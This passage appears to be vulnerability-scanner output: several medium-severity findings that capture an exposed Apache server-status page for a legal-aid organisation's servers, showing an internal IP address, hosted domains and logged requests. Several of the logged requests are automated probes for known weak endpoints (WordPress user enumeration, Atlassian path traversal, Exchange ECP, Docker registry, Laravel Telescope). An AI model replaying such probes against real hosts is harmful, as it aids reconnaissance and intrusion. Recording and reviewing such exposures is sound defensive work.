::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.0061755400.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.0061755300.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.0061755100.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.0061755200.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea1e60abb3
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 01-Dec-2025 04:59:53 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 5 days 12 hours 23 minutes 1 second Server load: 0.00 0.00 0.00 Total accesses: 4431 - Total Traffic: 158.2 MB CPU Usage: u17.9 s1.8 cu0 cs0 - .00413% CPU load .0093 requests/sec - 348 B/second - 36.6 kB/request 1 requests currently being processed, 9 idle workers ____.___._W._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-549000/58/350_ 1.8529079630.00.3410.33 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1764562284.303761005401611 1-565090/9/361_ 0.3429013260.00.288.73 15.158.254.235http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-547380/94/418_ 1.13280490.00.9510.89 130.176.208.182http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-550500/41/213_ 3.52137700.01.449.14 130.176.208.182http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-5-0/0/319. 0.586040700.00.0010.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-547520/85/333_ 0.69132300.09.5818.41 130.176.208.182http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 6-550590/49/365_ 5.51667000.011.1821.91 3.129.63.56http/1.1atlantalegalaid.org:8080GET /cgi-bin/authLogin.cgi HTTP/1.1 7-563570/73/400_ 0.27290011730.01.4111.97 130.176.187.246http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-5-0/0/342. 0.006041300.00.009.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-564790/13/189_ 0.1528552750.00.569.37 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-5648425/36/348W 0.570058.30.168.85 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 11-5-0/0/191. 0.006041200.00.007.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-564940/18/239_ 1.349480.00.547.60 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 13-5-0/0/181. 0.006041100.00.006.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-5-0/0/105. 0.006041000.00.003.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-5-0/0/19. 0.006040800.00.000.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-5-0/0/22. 0.006040900.00.001.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-4-0/0/13. 0.9712178800.00.000.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0041490200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2241486000.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0041490100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5641486100.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0041489900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0041490000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea65fa1b3c
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 30-Nov-2025 12:08:47 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 4 days 19 hours 31 minutes 56 seconds Server load: 0.00 0.00 0.00 Total accesses: 4035 - Total Traffic: 132.4 MB CPU Usage: u19.62 s1.9 cu0 cs0 - .00517% CPU load .0097 requests/sec - 333 B/second - 33.6 kB/request 1 requests currently being processed, 8 idle workers _______W_....................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-549000/8/300_ 1.3995380.00.0710.05 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-547460/44/350_ 0.2343500.00.158.44 3.172.13.106http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-547380/48/372_ 0.764400.00.1510.08 3.172.13.106http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 3-550500/6/178_ 0.0695430.00.067.76 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 4-547510/9/314_ 0.5894400.00.1310.91 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-547520/10/258_ 0.4994420.00.239.06 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 6-550590/7/323_ 0.5236500.00.1610.89 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 7-5635720/20/347W 0.030052.70.0510.60 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-547390/41/338_ 0.474500.00.149.38 3.172.13.106http/1.1elearning.alas.org:8080GET /config.json HTTP/1.1 9-4-0/0/176. 3.016113900.00.008.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-4-0/0/312. 2.582062500.00.008.69 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01 11-4-0/0/189. 0.552062500.00.007.21 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x02\x01\x9a\x01 12-4-0/0/221. 1.822062500.00.007.06 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xa7\x01 13-4-0/0/179. 1.632062500.00.006.35 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xa7\x01 14-4-0/0/103. 0.426112300.00.003.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-4-0/0/18. 1.596112100.00.000.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-4-0/0/21. 1.646111900.00.001.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-4-0/0/13. 0.976112200.00.000.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0035423600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2235419400.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0035423500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5635419500.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0035423300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0035423400.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea974788e2
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 30-Nov-2025 12:07:44 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 4 days 19 hours 30 minutes 53 seconds Server load: 0.00 0.00 0.00 Total accesses: 3970 - Total Traffic: 132.2 MB CPU Usage: u22.27 s2.13 cu0 cs0 - .00587% CPU load .00955 requests/sec - 333 B/second - 34.1 kB/request 3 requests currently being processed, 6 idle workers _KW_____K....................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-549000/8/300_ 1.3933380.00.0710.05 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-5474625/29/335K 0.2000118.30.128.42 3.172.13.106http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 2-5473827/36/360W 0.7200119.80.1310.06 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 3-550500/6/178_ 0.0632430.00.067.76 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 4-547510/9/314_ 0.5831400.00.1310.91 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-547520/10/258_ 0.4931420.00.239.06 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 6-550590/6/322_ 0.4813512580.00.1310.86 130.176.185.46http/1.1atlantalegalaid.org:8080GET /wp-includes/id3/license.txt/wp-login.php HTTP/1.1 7-563570/0/327_ 3.063900.00.0010.55 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x03\x01\x99\x01 8-5473918/24/321K 0.4300109.80.119.35 3.172.13.106http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-4-0/0/176. 3.016107600.00.008.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-4-0/0/312. 2.582056200.00.008.69 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01 11-4-0/0/189. 0.552056200.00.007.21 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x02\x01\x9a\x01 12-4-0/0/221. 1.822056200.00.007.06 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xa7\x01 13-4-0/0/179. 1.632056200.00.006.35 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xa7\x01 14-4-0/0/103. 0.426106000.00.003.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-4-0/0/18. 1.596105800.00.000.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-4-0/0/21. 1.646105600.00.001.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-4-0/0/13. 0.976105900.00.000.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0035417400.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2235413100.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0035417300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5635413200.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0035417100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0035417200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feac7979d81
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 30-Nov-2025 12:07:48 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 4 days 19 hours 30 minutes 57 seconds Server load: 0.00 0.00 0.00 Total accesses: 3987 - Total Traffic: 132.2 MB CPU Usage: u22.27 s2.14 cu0 cs0 - .00587% CPU load .00959 requests/sec - 333 B/second - 34.0 kB/request 3 requests currently being processed, 6 idle workers _KK_____W....................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-549000/8/300_ 1.3937380.00.0710.05 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-5474631/35/341K 0.2000124.90.138.42 3.172.13.106http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 2-5473833/42/366K 0.7300128.20.1310.07 3.172.13.106http/1.1elearning.alas.org:8080GET /s/9323e25363e25383e22353/_/;/META-INF/maven/com.atlassian. 3-550500/6/178_ 0.0636430.00.067.76 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 4-547510/9/314_ 0.5835400.00.1310.91 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-547520/10/258_ 0.4935420.00.239.06 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 6-550590/6/322_ 0.4813552580.00.1310.86 130.176.185.46http/1.1atlantalegalaid.org:8080GET /wp-includes/id3/license.txt/wp-login.php HTTP/1.1 7-563570/0/327_ 3.064300.00.0010.55 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x03\x01\x99\x01 8-5473923/29/326W 0.4300115.30.129.36 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 9-4-0/0/176. 3.016108000.00.008.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-4-0/0/312. 2.582056600.00.008.69 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01 11-4-0/0/189. 0.552056600.00.007.21 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x02\x01\x9a\x01 12-4-0/0/221. 1.822056600.00.007.06 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xa7\x01 13-4-0/0/179. 1.632056600.00.006.35 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xa7\x01 14-4-0/0/103. 0.426106400.00.003.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-4-0/0/18. 1.596106200.00.000.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-4-0/0/21. 1.646106000.00.001.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-4-0/0/13. 0.976106300.00.000.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0035417800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2235413500.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0035417700.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5635413600.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0035417500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0035417600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea0cc783c0
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 30-Nov-2025 12:07:50 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 4 days 19 hours 30 minutes 58 seconds Server load: 0.00 0.00 0.00 Total accesses: 3992 - Total Traffic: 132.2 MB CPU Usage: u22.27 s2.14 cu0 cs0 - .00587% CPU load .0096 requests/sec - 333 B/second - 33.9 kB/request 3 requests currently being processed, 6 idle workers _WK_____K....................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-549000/8/300_ 1.3938380.00.0710.05 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-5474632/36/342W 0.2000126.00.138.42 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 2-5473833/42/366K 0.7310128.20.1310.07 3.172.13.106http/1.1elearning.alas.org:8080GET /s/9323e25363e25383e22353/_/;/META-INF/maven/com.atlassian. 3-550500/6/178_ 0.0637430.00.067.76 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 4-547510/9/314_ 0.5836400.00.1310.91 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-547520/10/258_ 0.4936420.00.239.06 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 6-550590/6/322_ 0.4813562580.00.1310.86 130.176.185.46http/1.1atlantalegalaid.org:8080GET /wp-includes/id3/license.txt/wp-login.php HTTP/1.1 7-563570/0/327_ 3.064400.00.0010.55 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x03\x01\x99\x01 8-5473927/33/330K 0.4300121.40.129.36 3.172.13.106http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 9-4-0/0/176. 3.016108200.00.008.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-4-0/0/312. 2.582056700.00.008.69 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01 11-4-0/0/189. 0.552056700.00.007.21 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x02\x01\x9a\x01 12-4-0/0/221. 1.822056700.00.007.06 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xa7\x01 13-4-0/0/179. 1.632056700.00.006.35 157.245.118.24http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xa7\x01 14-4-0/0/103. 0.426106600.00.003.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-4-0/0/18. 1.596106400.00.000.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-4-0/0/21. 1.646106200.00.001.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-4-0/0/13. 0.976106500.00.000.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0035417900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2235413700.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0035417800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5635413800.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0035417600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0035417700.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea96fa81ea
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 29-Nov-2025 12:21:47 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 5 Parent Server MPM Generation: 4 Server uptime: 3 days 19 hours 44 minutes 56 seconds Server load: 0.00 0.00 0.00 Total accesses: 3264 - Total Traffic: 118.2 MB CPU Usage: u40.33 s3.25 cu0 cs0 - .0132% CPU load .00988 requests/sec - 375 B/second - 37.1 kB/request 1 requests currently being processed, 6 idle workers ___...W.__._.................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-4295940/38/265_ 0.823864680.00.049.56 130.176.208.182http/1.1intranet.atlantalegalaid.org:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-4296040/39/247_ 0.50585010.00.076.94 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 2-4295430/5/263_ 0.5539316780.00.009.29 130.176.208.182http/1.1intranet.atlantalegalaid.org:80GET / HTTP/1.1 3-3-0/0/158. 1.585394400.00.007.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-3-0/0/263. 5.092140500.00.009.70 15.158.254.235http/1.1legalaidconnections.org:8080GET / HTTP/1.1 5-3-0/0/207. 4.05214052710.00.007.79 15.158.254.235http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-42955725/29/275W 0.140058.20.069.51 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 7-3-0/0/287. 7.105394500.00.009.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-4295580/37/241_ 0.02420200.00.118.60 205.210.31.154http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-4295440/4/157_ 1.17513600.00.418.08 207.154.252.217http/1.1atlantalegalaid.org:8080GET /get.php HTTP/1.1 10-3-0/0/271. 7.976703200.00.007.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-4295560/4/155_ 0.00497500.00.296.72 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-3-0/0/186. 4.445394600.00.006.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-3-0/0/147. 4.702140500.00.005.80 15.158.254.235http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-3-0/0/97. 0.006709200.00.003.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-1-0/0/6. 0.6826857600.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-1-0/0/10. 1.3026860700.00.000.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-1-0/0/6. 0.6926858000.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0026861600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2226857400.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0026861500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5626857500.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0026861300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0026861400.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fead16a2934
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 27-Nov-2025 05:02:43 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 2 Parent Server MPM Generation: 1 Server uptime: 1 day 12 hours 25 minutes 51 seconds Server load: 0.03 0.01 0.00 Total accesses: 1774 - Total Traffic: 71.6 MB CPU Usage: u77.45 s5.85 cu0 cs0 - .0635% CPU load .0135 requests/sec - 572 B/second - 41.3 kB/request 1 requests currently being processed, 9 idle workers ._.._.___.____W................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1-0/0/132. 8.52911900.00.005.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-183290/21/100_ 2.3456612400.00.803.85 206.168.34.115http/1.1atlantalegalaid.org:8080\x16\x03\x01 2-1-0/0/116. 6.02917600.00.004.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-1-0/0/115. 1.75912000.00.005.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-170020/62/138_ 9.0956672410.02.935.84 206.168.34.115http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 5-1-0/0/138. 0.67912200.00.004.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-170070/52/127_ 10.72566800.02.525.70 206.168.34.115http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-170080/114/182_ 5.99566200.03.516.07 206.168.34.115http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 8-170130/60/116_ 6.91110000.02.774.65 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-1-0/0/77. 1.01912100.00.003.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 